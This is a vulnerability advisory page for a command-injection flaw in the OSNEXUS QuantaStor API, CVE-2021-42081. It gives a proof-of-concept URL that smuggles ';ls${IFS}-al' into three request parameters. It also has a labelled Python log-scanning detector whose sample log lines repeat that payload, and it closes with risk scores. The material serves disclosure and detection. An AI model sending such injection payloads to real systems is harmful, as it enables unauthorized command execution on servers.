CVE-2021-42081 | Authenticated Remote Command Execution vulnerability in OSNEXUS QuantaStor before 6.0.0.355
An authenticated administrator is allowed to remotely execute arbitrary shell commands via the API.
POC
http://<IP_ADDRESS>/qstorapi/storageSystemModify?storageSystem=&newName=quantastor&newDescription=;ls${IFS}-al&newLocation=4&newEnclosureLayoutId=5&newDnsServerList=;ls${IFS}-al&externalHostName=&newNTPServerList=;ls${IFS}-al
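A detection check for the request shape shown in the POC, as an added example that is not part of the advisory or of OSNEXUS code: it scans web access log lines for calls to /qstorapi/storageSystemModify whose query parameters contain shell metacharacters after URL-decoding. It assumes Common Log Format with the query string recorded; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

ENDPOINT = "/qstorapi/storageSystemModify"  # endpoint named in the POC
# Characters and expansions that have no place in a name, description or server list.
SHELL_META = re.compile(r"[;|&`<>\n]|\$\(|\$\{")
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - admin [12/Oct/2021:10:01:22 +0000] "GET /qstorapi/storageSystemModify'
    '?storageSystem=&newName=quantastor&newDescription=lab%20array'
    '&newDnsServerList=192.0.2.53 HTTP/1.1" 200 512',
    '192.0.2.77 - admin [12/Oct/2021:10:04:09 +0000] "GET /qstorapi/storageSystemModify'
    '?storageSystem=&newName=quantastor&newDescription=;ls${IFS}-al&newLocation=4'
    '&newEnclosureLayoutId=5&newDnsServerList=;ls${IFS}-al&externalHostName='
    '&newNTPServerList=;ls${IFS}-al HTTP/1.1" 200 512',
    # Same payload as the POC, percent-encoded: decoding must happen before matching.
    '192.0.2.77 - admin [12/Oct/2021:10:05:40 +0000] "GET /qstorapi/storageSystemModify'
    '?newName=quantastor&newDescription=%3Bls%24%7BIFS%7D-al HTTP/1.1" 200 512',
    '198.51.100.5 - - [12/Oct/2021:10:06:00 +0000] "GET /index.html?q=a;b HTTP/1.1" 200 100',
]

def suspicious_params(target):
    """Return (name, value) pairs with shell metacharacters, for the POC endpoint only."""
    parts = urlsplit(target)
    if parts.path.rstrip("/") != ENDPOINT:
        return []
    params = parse_qsl(parts.query, keep_blank_values=True)  # also URL-decodes values
    return [(name, value) for name, value in params if SHELL_META.search(value)]

def scan(lines):
    """Return (line number, client address, flagged parameter names) per suspicious request."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        flagged = suspicious_params(match.group("target"))
        if flagged:
            hits.append((lineno, line.split()[0], [name for name, _ in flagged]))
    return hits

if __name__ == "__main__":
    for lineno, client, names in scan(SAMPLE_LOG):
        print(f"line {lineno}: {client} sent shell metacharacters in {', '.join(names)}")
```

A hit means a request matching the POC pattern reached the API; on systems running a version before 6.0.0.355, treat it as possible command execution and review the host.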
Conclusion & alert: CVE-2021-42081 is rated Moderate Risk (57.5/100): CVSS Critical severity, with medium exploitation likelihood (EPSS 0.99%). Mandatory action: Review affected assets and schedule remediation.
Risk is dynamic; we continuously reassess and refresh what is shown on this page as upstream context changes.
Exploit prediction scoring system (EPSS) score for CVE-2021-42081
EPSS lead: Daily EPSS estimates relative likelihood of exploitation; percentile ranks this CVE among scored vulnerabilities (higher = more severe relative rank).